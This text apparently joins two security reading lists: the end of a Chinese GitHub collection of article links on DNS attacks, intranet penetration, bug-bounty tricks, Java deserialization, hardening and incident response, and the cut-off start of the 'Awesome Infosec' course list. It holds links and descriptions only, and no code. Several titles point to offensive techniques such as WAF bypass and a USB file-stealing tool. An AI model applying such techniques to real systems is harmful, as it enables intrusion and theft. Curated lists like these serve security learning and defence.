[对登录中账号密码进行加密之后再传输的爆破的思路和方式](https://www.freebuf.com/articles/web/127888.html) ### DNS * [DNS域传送漏洞学习总结](https://larry.ngrep.me/2015/09/02/DNS-zone-transfer-studying/) * [利用Python实现DGA域名检测](http://www.freebuf.com/articles/web/145981.html) * [DNS-Persist: 利用 DNS 协议进行远程控制通信](https://github.com/0x09AL/DNS-Persist) * [本地DNS攻击原理与实例](https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247485308&idx=1&sn=35ef757470ec4057babfb898c5ec5c19&chksm=ec1e3754db69be42b44976d6841842c7a42afc227d7dcd6c50bdbf4edcda028ae7cf90ada9a9#rd) * [error dns response](https://ripe75.ripe.net/presentations/20-A-curious-case-of-broken-DNS-responses-RIPE-75.pdf) * [DNS隧道检测平民解决方案](http://www.freebuf.com/articles/network/149328.html) * [DNS泛解析是怎么被黑客玩坏的](http://www.freebuf.com/news/133873.html) * [DNS Tunneling及相关实现](http://www.freebuf.com/sectool/112076.html) * [DNS 域传送tools](http://www.freebuf.com/sectool/79315.html) * [Dnslog在SQL注入中的实战](https://www.anquanke.com/post/id/98096) ## 其他 #### Git * [Git各种错误操作撤销的方法](http://www.bugcode.cn/git_undo.html) * [Git的tip](https://github.com/521xueweihan/git-tips) #### 二维码 * [微信Netting-QRLJacking分析利用-扫我二维码获取你的账号权限](https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=25923&highlight=%E4%BA%8C%E7%BB%B4%E7%A0%81) * [Android平台下二维码漏洞攻击杂谈](https://wooyun.js.org/drops/Android%E5%B9%B3%E5%8F%B0%E4%B8%8B%E4%BA%8C%E7%BB%B4%E7%A0%81%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BB%E6%9D%82%E8%B0%88.html) * [二维码登陆的常见缺陷剖析](https://www.t00ls.net/thread-45152-1-1.html) * [二维码安全-淘宝例子](https://www.t00ls.net/thread-45618-1-1.html) #### 爬虫 * [浅谈动态爬虫与去重](https://www.anquanke.com/post/id/85298) * [浅谈动态爬虫与去重(续)](https://www.anquanke.com/post/id/95294#h2-1) * [爬虫基础篇[Web 漏洞扫描器]](http://blog.fatezero.org/2018/03/05/web-scanner-crawler-01/) #### 效率 之前的想起来补上 * [chrome-is-bad](https://chromeisbad.com/) chrome带慢mac原因 * [zsh 和 oh my zsh冷启动速度优化](https://blog.skk.moe/post/make-oh-my-zsh-fly/) #### 科普 * [10大深网搜索引擎](http://www.freebuf.com/news/137844.html) * [在百度网盘上看到上万条车主个人信息,企业、政府高官信息、各种数据](https://bbs.ichunqiu.com/article-798-1.html) * [一道 CTF 题 get 到的新姿势](https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247485297&idx=1&sn=b9d5f80bcd37d1ce0596e1a2c251d9fb&chksm=ec1e3759db69be4f84913826e4b4e5d79461061e0f61a4eb8889aa65909e2ab314391d94f87c#rd) * [iPhone锁屏却锁不住个人信息,iOS安全性真的很高吗?](http://www.freebuf.com/vuls/153848.html) * [弦哥从新加坡HITB黑客大会进口过来的黑魔法命令](https://github.com/tom0li/security_circle/blob/master/51115142241184.md) * [编程的重要性之 sqlmap 源码](https://github.com/tom0li/security_circle/blob/master/88511152424522.md) * [资讯400多个流行站点记录用户键击 或导致个人敏感信息泄露](http://bobao.360.cn/news/detail/4389.html) * [https劫持理解](https://forum.90sec.org/forum.php?mod=viewthread&tid=10378&extra=page%3D3) * [TCP 常见故障排查](https://ms2008.github.io/2018/06/01/tcp-troubleshooting/) * [银行卡quickpass闪付芯片通过EVM/PBOC读取隐私信息](https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=25955&ctid=48) * [txt文本文件去重及导入数据库处理](https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=25725&ctid=48) * [解析U盘病毒传播之文件欺骗](http://www.freebuf.com/articles/terminal/155063.html) * [深度剖析:手机指纹的马奇诺防线](https://paper.seebug.org/471/) * [网撸黑话+技巧大全 | 岂安低调分享](https://www.secpulse.com/archives/66549.html) * [国外14亿数据](http://www.03sec.com/3190.shtml) * [Word文件加密之后](https://www.secpulse.com/archives/67398.html) * [腾讯2017年度网络黑产威胁源研究报告](https://book.yunzhan365.com/odqt/yzzl/mobile/index.html) * [洗钱工具“手机充值卡”卡号卡密灰色行业套现洗白链](http://www.freebuf.com/column/163232.html) * [请求方法问题](http://www.freebuf.com/articles/web/172695.html) * [Python工具分析风险数据](https://www.secpulse.com/archives/66377.html) * [技术讨论 | 构建一个小巧的来电显示迷惑工具](http://www.freebuf.com/sectool/173730.html) * [google.com/machine-learning/crash-course/](https://developers.google.com/machine-learning/crash-course/?hl=zh-cn) * [远程定位追踪联网车辆以及利用思路分析](http://www.freebuf.com/vuls/178604.html) * [智能锁具攻防系列一初探](https://future-sec.com/intelligent-lock-attack-and-defense-1.html) * [我的世界观](https://mp.weixin.qq.com/s?__biz=MzA3NTEzMTUwNA==&mid=200044901&idx=1&sn=2a40b65874b54f7d2c80303ee6558d9b#rd) * [偷U盘文件的神器](https://github.com/kenvix/USBCopyer) * [内网安全检查/渗透总结](https://xz.aliyun.com/t/2354) * [Linux内网渗透](https://thief.one/2017/08/09/2/) * [内网渗透思路探索 之新思路的探索与验证](https://paper.tuisec.win/detail/521f97451904b16) * [初级域渗透系列 - 01. 基本介绍&信息获取](https://paper.tuisec.win/detail/2a7446285e7d085) * [初级域渗透系列 - 02. 常见攻击方法 - 1](https://paper.tuisec.win/detail/fc1086dabbc9002) * [初级域渗透系列 03. 常见攻击方法](https://paper.tuisec.win/detail/cd49c17ca23cece) * [内网渗透知识基础及流程](https://www.anquanke.com/post/id/170471) * [RemTeam攻击技巧和安全防御](https://xz.aliyun.com/t/4602) * [Web-Security-Note](https://github.com/Smi1eSEC/Web-Security-Note) * [Web安全中比较好的文章](https://github.com/spoock1024/web-security) - 主要是新人入门方向 * [Fuzz自动化Bypass软WAF姿势](https://4hou.win/wordpress/?p=15613) * [灰袍2017](https://github.com/ChrisLinn/greyhame-2017) * [一次红队之旅](https://xz.aliyun.com/t/2389) 入门 * [非正经硬盘脱密方式](https://mp.weixin.qq.com/s/yaWCeemFXA3DkJNR22Nbig) * [linux-suid-privilege-escalation](https://www.leavesongs.com/PENETRATION/linux-suid-privilege-escalation.html) * [Hard_winGuide.md](https://github.com/CHEF-KOCH/HWAB/blob/master/Guide.md) * [Enterprise-Registration-Data-of-Chinese-Mainland](https://github.com/imhuster/Enterprise-Registration-Data-of-Chinese-Mainland) * [道哥的黑板报](https://zhuanlan.zhihu.com/taosay) - 思考很深的年轻人 真正的大牛 * [Why ping uses UDP port 1025](http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/02/19/ping-1025) exists just socket/connect/getsockname/close,目的是获取source ip 旧 ``` ### 建设 * [Enterprise_Security_Build--Open_Source](https://bloodzer0.github.io) * [一个人的安全部](http://www.freebuf.com/articles/security-management/126254.html) * [没有钱的安全部之资产安全](http://www.jianshu.com/p/572431447613?from=timeline) * [一个人的企业安全建设实践](https://xianzhi.aliyun.com/forum/topic/1568/) * [单枪匹马搞企业安全建设](https://xianzhi.aliyun.com/forum/topic/1916) * [“一个人”的互金企业安全建设总结](http://www.freebuf.com/articles/neopoints/158724.html) * [低成本企业安全建设部分实践](https://xianzhi.aliyun.com/forum/topic/1996) * [饿了么运维基础设施进化史](https://mp.weixin.qq.com/s?__biz=MzA4Nzg5Nzc5OA==&mid=2651668800&idx=1&sn=615af5f120d1298475aaf4825009cb30&chksm=8bcb82e9bcbc0bff6309d9bbaf69cfc591624206b846e00d5004a68182c934dab921b7c25794&scene=38#wechat_redirect) * [B站日志系统的前世今生](https://mp.weixin.qq.com/s/onrBwQ0vyLJYWD_FRnNjEg) * [爱奇艺业务安全风控体系的建设实践](https://mp.weixin.qq.com/s/2gcNY0LmgxpYT1K6uDaWtg) * [美团外卖自动化业务运维系统建设](https://tech.meituan.com/digger_share.html) * [携程安全自动化测试之路](http://techshow.ctrip.com/archives/2315.html) * [企业安全中DevSecOps的一些思考](http://www.freebuf.com/articles/es/145567.html) * [企业安全经验 应急响应的战争](http://www.freebuf.com/articles/web/155314.html) * [企业安全项目架构实践分享](https://xianzhi.aliyun.com/forum/topic/1718) * [以溯源为目的蜜罐系统建设](http://www.4hou.com/technology/9687.html) * [蜜罐与内网安全从0到1(一)](https://xianzhi.aliyun.com/forum/topic/998) * [蜜罐与内网安全从0到1(二)](https://xianzhi.aliyun.com/forum/topic/997) * [蜜罐与内网安全从0到1(三)](https://xianzhi.aliyun.com/forum/topic/996) * [蜜罐与内网安全从0到1(四)](https://xianzhi.aliyun.com/forum/topic/1730) * [蜜罐与内网安全从0到1(五)](https://xianzhi.aliyun.com/forum/topic/1955) * [企业安全建设—模块化蜜罐平台的设计思路与想法](https://xianzhi.aliyun.com/forum/topic/1885) * [蜜罐调研与内网安全](https://xz.aliyun.com/t/7294) * [Real-timeDetectionAD](https://github.com/sisoc-tokyo/Real-timeDetectionAD_ver2) - https://bithack.io/forum/505 - 域内蜜罐 * [HFish](https://bithack.io/forum/505) - 蜜罐框架 * [opencanary_web](https://github.com/p1r06u3/opencanary_web) * [tpotce](https://github.com/dtag-dev-sec/tpotce/) * [ElastAlert监控日志告警Web攻击行为](http://www.freebuf.com/articles/web/160254.html) * [OSSIM分布式安装实践](https://www.secpulse.com/archives/67514.html) * [企业信息安全团队建设](https://xianzhi.aliyun.com/forum/topic/1965) * [一个人的安全部之ELK接收Paloalto日志并用钉钉告警](http://www.freebuf.com/articles/others-articles/161905.html) * [账号安全的异常检测](https://mp.weixin.qq.com/s/qMjNURydlhzby9Qhs6RZhQ) * [一般型网站日志接入大数据日志系统的实现](http://www.freebuf.com/column/166112.html) * [基础设施的攻击日志 – 第1部分:日志服务器的设置](https://www.secpulse.com/archives/70001.html) * [基础设施的攻击日志记录 – 第2部分:日志聚合](https://www.secpulse.com/archives/70016.html) * [基础设施攻击日志记录 – 第3部分:Graylog仪表板](https://www.secpulse.com/archives/70149.html) * [基础设施的攻击日志记录 – 第4部分:日志事件警报](https://www.secpulse.com/archives/70207.html) * [宜信防火墙自动化运维之路](http://www.freebuf.com/articles/security-management/166895.html) * [证书锁定](https://www.secpulse.com/archives/75212.html) * [中通内部安全通讯实践](https://xz.aliyun.com/t/3759) * [那些年我们堵住的洞 – OpenRASP纪实](https://anquan.baidu.com/article/855) * [源头之战,不断升级的攻防对抗技术 —— 软件供应链攻击防御探索](https://security.tencent.com/index.php/blog/msg/140) * [网络空间安全时代的红蓝对抗建设](https://security.tencent.com/index.php/blog/msg/139) #### 加固 * [Linux基线加固](https://mp.weixin.qq.com/s/0nxiZw1NUoQTjxcd3zl6Zg) * [基线检查表&安全加固规范](https://xianzhi.aliyun.com/forum/topic/1127/) * [浅谈linux安全加固](https://mp.weixin.qq.com/s/y8np-sFzik15x09536QA5w) * [CentOS 7 主机加固](http://www.cnblogs.com/xiaoxiaoleo/p/6678727.html) * [APACHE 常见加固](http://cncc.bingj.com/cache.aspx?q=APACHE+%E5%B8%B8%E8%A7%81%E5%8A%A0%E5%9B%BA++0xmh&d=4797622048333774&mkt=zh-CN&setlang=zh-CN&w=WrFf2nH3PRyFtNxa6T7D-zazauskMnwg) * [Apache服务器安全配置](http://webcache.googleusercontent.com/search?q=cache:GZSS-N0OXY8J:foreversong.cn/archives/789+&cd=1&hl=zh-CN&ct=clnk&gl=sg&lr=lang_en%7Clang_zh-CN) * [GNU/Linux安全基线与加固](http://cb.drops.wiki/drops/tips-2621.html) * [windows服务器安全配置策略](https://www.yesck.com/post/528/) * [15步打造一个安全的Linux服务器](https://www.freebuf.com/articles/system/121540.html) * [Tomcat7 加固清单](https://threathunter.org/topic/59911277ec721b1f1966e7eb) * [Tomcat安全设置和版本屏蔽](http://www.freebuf.com/column/163296.html) * [IIS服务器安全配置](http://foreversong.cn/archives/803) * [企业常见服务漏洞检测&修复整理](http://www.mottoin.com/92742.html) * [运维安全概述](http://cb.drops.wiki/drops/%E8%BF%90%E7%BB%B4%E5%AE%89%E5%85%A8-8169.html) * [浅谈Linux系统MySQL安全配置](https://mp.weixin.qq.com/s/0KrfdrjbcRdvSTKxoNHOcA) * [Hardening Ubuntu](https://github.com/konstruktoid/hardening) * [Tomcat Config Security](https://joychou.org/operations/tomcat-config-security.html) * [安全运维中基线检查的自动化之ansible工具巧用](https://bbs.ichunqiu.com/thread-46896-1-1.html?from=snew) * [https://github.com/netxfly/sec_check](https://github.com/netxfly/sec_check) #### 响应 溯源 * [awesome-incident-response](https://github.com/meirwah/awesome-incident-response) - A curated list of tools and resources for security incident response, aimed to help security analysts and DFIR teams. * [黑客入侵应急分析手工排查](https://xianzhi.aliyun.com/forum/topic/1140/) * [应急tools](https://github.com/meirwah/awesome-incident-response/blob/master/README_ch.md) * [Linux服务器应急事件溯源报告](http://wooyun.jozxing.cc/static/drops/tips-12972.html) * [应急响应小记链接已挂](https://threathunter.org/topic/5943a99c1e3732874e23f996) * [大型互联网企业入侵检测实战总结](https://xz.aliyun.com/t/1626/) * [Linux应急响应姿势浅谈](http://bobao.360.cn/learning/detail/4481.html) * [安全应急姿势](http://rinige.com/index.php/archives/824/) * [Web日志安全分析浅谈](https://xianzhi.aliyun.com/forum/topic/1121/) * [域名劫持事件发生后的应急响应策略](http://www.freebuf.com/articles/security-management/118425.html) * [我的日志分析之道:简单的Web日志分析脚本 ](http://www.freebuf.com/sectool/126698.html) * [攻击检测和防范方法之日志分析](http://www.freebuf.com/articles/web/109001.html) * [Tomcat日志如何记录POST数据](https://secvul.com/topics/1087.html) * [邮件钓鱼攻击与溯源](https://4hou.win/wordpress/?p=28874) * [应急响应实战笔记](https://github.com/Bypass007/Emergency-Response-Notes) - Bypass007 * [某云用户网站入侵应急响应](http://www.freebuf.com/articles/network/134372.html) * [IP 定位逆向追踪溯源访客真实身份调查取证](https://lcx.cc/post/4595/) * [域名背后的真相,一个黑产团伙的沦陷](https://www.freebuf.com/articles/terminal/127228.html) * [看我如何从54G日志中溯源web应用攻击路径](https://paper.tuisec.win/detail/a56f79f0d7126f5) #### 综合 * [企业安全实践(基础建设)之部分资产收集](http://www.freebuf.com/column/157085.html) * [企业安全实践(基础建设)之IP资产监控](http://www.freebuf.com/column/157496.html) * [企业安全实践(基础建设)之主动分布式WEB资产扫描](http://www.freebuf.com/column/157546.html) * [企业安全实践(基础建设)之被动扫描自动化(上)](http://www.freebuf.com/column/157635.html) * [企业安全实践(基础建设)之被动扫描自动化(中)](http://www.freebuf.com/column/157947.html) * [企业安全实践(基础建设)之被动扫描自动化(下)](http://www.freebuf.com/column/157996.html) * [企业安全实践(基础建设)之WEB安全检查](http://www.freebuf.com/column/158358.html) * [企业安全实践(基础建设)之HIDS(上)](http://www.freebuf.com/column/158449.html) * [企业安全实践(基础建设)之HIDS(下)](http://www.freebuf.com/column/158677.html) * [0xA1: 新官上任三把火](https://zhuanlan.zhihu.com/p/26485293) * [0xA2 应急响应、防御模型与SDL](https://zhuanlan.zhihu.com/p/26542790) * [0xA3 安全域划分和系统基本加固](https://zhuanlan.zhihu.com/p/26603906) * [0xB1 微观安全——一台服务器做安全](https://zhuanlan.zhihu.com/p/27363168) * [0xB2 事件应急——企业内网安全监控概览](https://zhuanlan.zhihu.com/p/29816766) * [0xB3 再谈应急响应Pt.1 unix主机应急响应 elknot](https://zhuanlan.zhihu.com/p/29958172) * [0xB4 企业安全建设中评估业务潜在风险的思路](https://zhuanlan.zhihu.com/p/31263844?group_id=916355317818970112) * [企业安全体系建设之路之系统安全篇](https://xianzhi.aliyun.com/forum/topic/1949) * [企业安全体系建设之路之网络安全篇](https://xianzhi.aliyun.com/forum/topic/1950) * [企业安全体系建设之路之产品安全篇](https://xianzhi.aliyun.com/forum/topic/1951) * [SOC异闻录](https://www.anquanke.com/post/id/95231) * [开源软件创建SOC的一份清单](http://www.freebuf.com/articles/network/169632.html) * [开源SOC的设计与实践](http://www.freebuf.com/articles/network/173282.html) * [F5 BIG-IP Security Cheatsheet](https://github.com/dnkolegov/bigipsecurity) #### 原bug bounty * [SRC漏洞挖掘小见解](http://www.mottoin.com/95043.html) * [面向SRC的漏洞挖掘总结](http://blkstone.github.io/2017/05/28/finding-src-vuls/) * [漏洞挖掘经验分享Saviour](https://xianzhi.aliyun.com/forum/topic/1214/) * [我的SRC之旅](https://mp.weixin.qq.com/s/2ORHnywrxXPexviUYk7Ccg) * [浅析通过"监控"来辅助进行漏洞挖掘](https://bbs.ichunqiu.com/thread-28591-1-1.html) * [威胁情报-生存在SRC平台中的刷钱秘籍](https://bbs.ichunqiu.com/article-921-1.html) * [威胁情报](https://mp.weixin.qq.com/s/v2MRx7qs70lpnW9n-mJ7_Q) * [YSRC众测之我的漏洞挖掘姿势](https://bbs.ichunqiu.com/article-655-1.html) * [SRC的漏洞分析](https://bbs.ichunqiu.com/thread-19745-1-1.html) * [众测备忘手册](https://mp.weixin.qq.com/s/4XPG37_lTZDzf60o3W_onA) * [挖洞技巧:如何绕过URL限制](https://www.secpulse.com/archives/67064.html) * [挖洞技巧:APP手势密码绕过思路总结](https://www.secpulse.com/archives/67070.html) * [挖洞技巧:支付漏洞之总结](https://www.secpulse.com/archives/67080.html) * [挖洞技巧:绕过短信&邮箱轰炸限制以及后续](http://mp.weixin.qq.com/s/5OSLC2GOeYere9_lT2RwHw) * [挖洞技巧:信息泄露之总结](https://www.secpulse.com/archives/67123.html) * [阿里云oss key利用](https://www.t00ls.net/viewthread.php?tid=52875&highlight=oss) * [任意文件下载引发的思考](https://www.secpulse.com/archives/68522.html) * [任意文件Getshell](https://xz.aliyun.com/t/6958) * [通用性业务逻辑组合拳劫持你的权限](https://www.anquanke.com/post/id/106961) * [组合漏洞导致的账号劫持](https://xz.aliyun.com/t/3514) * [我的通行你的证](https://lvwei.me/passport.html#toc_0) * [那些年我们刷过的SRC之企业邮箱暴破](https://www.secquan.org/Discuss/262) * [各大SRC中的CSRF技巧](https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=28448&highlight=src) * [一些逻辑](https://secvul.com/topics/924.html) * [一个登陆框引起的血案](http://www.freebuf.com/articles/web/174408.html) * [OAuth回调参数漏洞案例解析](https://03i0.com/2018/04/01/OAuth%E5%9B%9E%E8%B0%83%E5%8F%82%E6%95%B0%E6%BC%8F%E6%B4%9E%E6%A1%88%E4%BE%8B%E8%A7%A3%E6%9E%90/) * [子域名接管指南](https://www.secpulse.com/archives/95304.html) * [Subdomain Takeover](https://www.secpulse.com/archives/94973.html) * [Subdomain Takeover/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz) * [Subdomain-takeover](https://echocipher.github.io/2019/08/14/Subdomain-takeover/) * [过期链接劫持的利用方法探讨](http://www.freebuf.com/articles/web/151836.html) * [国外赏金之路](https://blog.securitybreached.org/2017/11/25/guide-to-basic-recon-for-bugbounty/) - 老司机赏金见解,历史赏金文章 list * [记一次失败的0元单的挖掘历程与一处成功的XSS案例](https://bbs.ichunqiu.com/article-636-1.html) * [看我如何发现谷歌漏洞跟踪管理平台漏洞获得$15600赏金](http://www.freebuf.com/articles/web/152893.html) * [看我如何利用简单的配置错误“渗透”BBC新闻网](http://www.freebuf.com/news/155558.html) * [分享一个近期遇到的逻辑漏洞案例](http://www.freebuf.com/vuls/151196.html) * [我是如何挖掘热门“约P软件”漏洞的](http://www.freebuf.com/articles/web/157391.html) * [新手上路 | 德国电信网站从LFI到命令执行漏洞](http://www.freebuf.com/articles/web/156950.html) * [Taking over Facebook accounts using Free Basics partner portal](https://www.josipfranjkovic.com/blog/facebook-partners-portal-account-takeover) * [The bug bounty program that changed my life](http://10degres.net/the-bugbounty-program-that-changed-my-life/) * [挖洞经验 | 看我如何免费获取价值€120的会员资格](http://www.freebuf.com/articles/web/172438.html) * [Scrutiny on the bug bounty](https://xz.aliyun.com/t/3935) * [1hack0/Facebook-Bug-Bounty-Write-ups](https://github.com/1hack0/Facebook-Bug-Bounty-Write-ups) * [Java反序列化漏洞-金蛇剑之hibernate(上)](https://xianzhi.aliyun.com/forum/topic/2030) * [Java反序列化漏洞-金蛇剑之hibernate(下)](https://xianzhi.aliyun.com/forum/topic/2031) * [Java反序列化漏洞-玄铁重剑之CommonsCollection(上)](https://xianzhi.aliyun.com/forum/topic/2028) * [Java反序列化漏洞-玄铁重剑之CommonsCollection(下)](https://xianzhi.aliyun.com/forum/topic/2029) * [Java反序列化漏洞从入门到深入](https://xianzhi.aliyun.com/forum/topic/2041) * [Java反序列化备忘录](https://xianzhi.aliyun.com/forum/topic/2042) * [Java反序列化漏洞之殇](https://xianzhi.aliyun.com/forum/topic/2043) * [Java反序列化漏洞学习实践一:从Serializbale接口开始,先弹个计算器](http://www.polaris-lab.com/index.php/archives/447/) * [Java反序列化漏洞学习实践二:Java的反射机制(Java Reflection)](http://www.polaris-lab.com/index.php/archives/450/) * [Java反序列化漏洞学习实践三:理解Java的动态代理机制](http://www.polaris-lab.com/index.php/archives/453/) ``` ## Contribute We welcome everyone to contribute,you can open an issue for this if you have some new idea about this project or you have found some quality safety articles,and then I will add your name to Acknowledgments. ## Acknowledgments * @[tom0li](https://github.com/tom0li) * @[neargle](https://github.com/neargle) * @[r4v3zn](https://github.com/0nise) ## Star 感谢Star [![Stargazers over time](https://starchart.cc/tom0li/collection-document.svg)](https://starchart.cc/tom0li/collection-document)
Awesome Infosec =============== [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) A curated list of awesome information security resources, inspired by the awesome-* trend on GitHub. Those resources and tools are intended only for cybersecurity professional and educational use in a controlled environment. Table of Contents ================= 1. [Massive Online Open Courses](#massive-online-open-courses) 2. [Academic Courses](#academic-courses) 3. [Laboratories](#laboratories) 4. [Capture the Flag](#capture-the-flag) 5. [Open Security Books](#open-security-books) 6. [Challenges](#challenges) 7. [Documentation](#documentation) 8. [SecurityTube Playlists](#securitytube-playlists) 9. [Related Awesome Lists](#related-awesome-lists) 10. [Contributing](#contributing) 11. [License](#license) Massive Online Open Courses =========================== #### Stanford University - Computer Security In this class you will learn how to design secure systems and write secure code. You will learn how to find vulnerabilities in code and how to design software systems that limit the impact of security vulnerabilities. We will focus on principles for building secure systems and give many real world examples. - [Stanford University - Computer Security](https://www.coursera.org/learn/security) #### Stanford University - Cryptography I This course explains the inner workings of cryptographic primitives and how to correctly use them. Students will learn how to reason about the security of cryptographic constructions and how to apply this knowledge to real-world applications. The course begins with a detailed discussion of how two parties who have a shared secret key can communicate securely when a powerful adversary eavesdrops and tampers with traffic. We will examine many deployed protocols and analyze mistakes in existing systems. The second half of the course discusses public-key techniques that let two or more parties generate a shared secret key. We will cover the relevant number theory and discuss public-key encryption and basic key-exchange. Throughout the course students will be exposed to many exciting open problems in the field. - [Stanford University - Cryptography I](https://www.coursera.org/learn/crypto) #### Stanford University - Cryptography II This course is a continuation of Crypto I and explains the inner workings of public-key systems and cryptographic protocols. Students will learn how to reason about the security of cryptographic constructions and how to apply this knowledge to real-world applications. The course begins with constructions for digital signatures and their applications. We will then discuss protocols for user authentication and zero-knowledge protocols. Next we will turn to privacy applications of cryptography supporting anonymous credentials and private database lookup. We will conclude with more advanced topics including multi-party computation and elliptic curve cryptography. - [Stanford University - Cryptography II](https://www.coursera.org/learn/crypto2) #### University of Maryland - Usable Security This course focuses on how to design and build secure systems with a human-centric focus. We will look at basic principles of human-computer interaction, and apply these insights to the design of secure systems with the goal of developing security measures that respect human performance and their goals within a system. - [University of Maryland - Usable Security](https://www.coursera.org/learn/usablesec) #### University of Maryland - Software Security This course we will explore the foundations of software security. We will consider important software vulnerabilities and attacks that exploit them -- such as buffer overflows, SQL injection, and session hijacking -- and we will consider defenses that prevent or mitigate these attacks, including advanced testing and program analysis techniques. Importantly, we take a "build security in" mentality, considering techniques at each phase of the development cycle that can be used to strengthen the security of software systems. - [University of Maryland - Software Security](https://www.coursera.org/learn/softwaresec) #### University of Maryland - Cryptography This course will introduce you to the foundations of modern cryptography, with an eye toward practical applications. We will learn the importance of carefully defining security; of relying on a set of well-studied "hardness assumptions" (e.g., the hardness of factoring large numbers); and of the possibility of proving security of complicated constructions based on low-level primitives. We will not only cover these ideas in theory, but will also explore their real-world impact. You will learn about cryptographic primitives in wide use today, and see how these can be combined to develop modern protocols for secure communication. - [University of Maryland - Cryptography](https://www.coursera.org/learn/cryptography) #### University of Maryland - Hardware Security This course will introduce you to the foundations of modern cryptography, with an eye toward practical applications. We will learn the importance of carefully defining security; of relying on a set of well-studied “hardness assumptions” (e.g., the hardness of factoring large numbers); and of the possibility of proving security of complicated constructions based on low-level primitives. We will not only cover these ideas in theory, but will also explore their real-world impact. You will learn about cryptographic primitives in wide use today, and see how these can be combined to develop modern protocols for secure communication. - [University of Maryland - Hardware Security](https://www.coursera.org/learn/hardwaresec) #### University of Washington - Introduction to CyberSecurity This course will introduce you to the cybersecurity, ideal for learners who are curious about the world of Internet security and who want to be literate in the field. This course will take a ride in to cybersecurity feild for beginners. - [University of Washington - Introduction to CyberSecurity](https://www.edx.org/course/introduction-to-cybersecurity) #### University of Washington - Finding Your Cybersecurity Career Path There are 5-6 major job roles in industry for cybersecurity enthusiast. In This course you will Learn about different career pathways in cybersecurity and complete a self-assessment project to better understand the right path for you. - [University of Washington - Finding Your Cybersecurity Career Path](https://www.edx.org/course/finding-your-cybersecurity-career-path) #### University of Washington - Essentials of Cybersecurity This course is good for beginner It contains introduction to cybersecurity, The CISO's view, Helps you building cybersecurity toolKit and find your cybersecurity career path. - [University of Washington - Essentials of Cybersecurity](https://www.edx.org/professional-certificate/uwashingtonx-essentials-cybersecurity) Academic Courses ================ #### NYU Tandon School of Engineering - OSIRIS Lab's Hack Night Developed from the materials of NYU Tandon's old Penetration Testing and Vulnerability Analysis course, Hack Night is a sobering introduction to offensive security. A lot of complex technical content is covered very quickly as students are introduced to a wide variety of complex and immersive topics over thirteen weeks. - [NYU Tandon's OSIRIS Lab's Hack Night](https://github.com/isislab/Hack-Night) #### Florida State University's - Offensive Computer Security The primary incentive for an attacker to exploit a vulnerability, or series of vulnerabilities is to achieve a return on an investment (his/her time usually). This return need not be strictly monetary, an attacker may be interested in obtaining access to data, identities, or some other commodity that is valuable to them. The field of penetration testing involves authorized auditing and exploitation of systems to assess actual system security in order to protect against attackers. This requires thorough knowledge of vulnerabilities and how to exploit them. Thus, this course provides an introductory but comprehensive coverage of the fundamental methodologies, skills, legal issues, and tools used in white hat penetration testing and secure system administration. * [Offensive Computer Security - Spring 2014](http://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity) * [Offensive Computer Security - Spring 2013](http://www.cs.fsu.edu/~redwood/OffensiveSecurity) #### Florida State University's - Offensive Network Security This class allows students to look deep into know protocols (i.e. IP, TCP, UDP) to see how an attacker can utilize these protocols to their advantage and how to spot issues in a network via captured network traffic. The first half of this course focuses on know protocols while the second half of the class focuses on reverse engineering unknown protocols. This class will utilize captured traffic to allow students to reverse the protocol by using known techniques such as incorporating bioinformatics introduced by Marshall Beddoe. This class will also cover fuzzing protocols to see if the server or client have vulnerabilities. Overall, a student finishing this class will have a better understanding of the network layers, protocols, and network communication and their interaction in computer networks. * [Offensive Network Security](http://www.cs.fsu.edu/~lawrence/OffNetSec/) #### Rensselaer Polytechnic Institute - Malware Analysis This course will introduce students to modern malware analysis techniques through readings and hands-on interactive analysis of real-world samples. After taking this course students will be equipped with the skills to analyze advanced contemporary malware using both static and dynamic analysis. - [CSCI 4976 - Fall '15 Malware Analysis](https://github.com/RPISEC/Malware) #### Rensselaer Polytechnic Institute - Modern Binary Exploitation This course will start off by covering basic x86 reverse engineering, vulnerability analysis, and classical forms of Linux-based userland binary exploitation. It will then transition into protections found on modern systems (Canaries, DEP, ASLR, RELRO, Fortify Source, etc) and the techniques used to defeat them. Time permitting, the course will also cover other subjects in exploitation including kernel-land and Windows based exploitation. * [CSCI 4968 - Spring '15 Modern Binary Exploitation](https://github.com/RPISEC/MBE) #### Rensselaer Polytechnic Institute - Hardware Reverse Engineering Reverse engineering techniques for semiconductor devices and their applications to competitive analysis, IP litigation, security testing, supply chain verification, and failure analysis. IC packaging technologies and sample preparation techniques for die recovery and live analysis. Deprocessing and staining methods for revealing features bellow top passivation. Memory technologies and appropriate extraction techniques for each. Study contemporary anti-tamper/anti-RE methods and their effectiveness at protecting designs from attackers. Programmable logic microarchitecture and the issues involved with reverse engineering programmable logic. - [CSCI 4974/6974 - Spring '14 Hardware Reverse Engineering](http://security.cs.rpi.edu/courses/hwre-spring2014/) #### City College of San Francisco - Sam Bowne Class - [CNIT 40: DNS Security ](https://samsclass.info/40/40_F16.shtml)<br> DNS is crucial for all Internet transactions, but it is subject to numerous security risks, including phishing, hijacking, packet amplification, spoofing, snooping, poisoning, and more. Learn how to configure secure DNS servers, and to detect malicious activity with DNS monitoring. We will also cover DNSSEC principles and deployment. Students will perform hands-on projects deploying secure DNS servers on both Windows and Linux platforms. - [CNIT 120 - Network Security](https://samsclass.info/120/120_S15.shtml)<br> Knowledge and skills required for Network Administrators and Information Technology professionals to be aware of security vulnerabilities, to implement security measures, to analyze an existing network environment in consideration of known security threats or risks, to defend against attacks or viruses, and to ensure data privacy and integrity. Terminology and procedures for implementation and configuration of security, including access control, authorization, encryption, packet filters, firewalls, and Virtual Private Networks (VPNs). - [CNIT 121 - Computer Forensics](https://samsclass.info/121/121_F16.shtml)<br> The class covers forensics tools, methods, and procedures used for investigation of computers, techniques of data recovery and evidence collection, protection of evidence, expert witness skills, and computer crime investigation techniques. Includes analysis of various file systems and specialized diagnostic software used to retrieve data. Prepares for part of the industry standard certification exam, Security+, and also maps to the 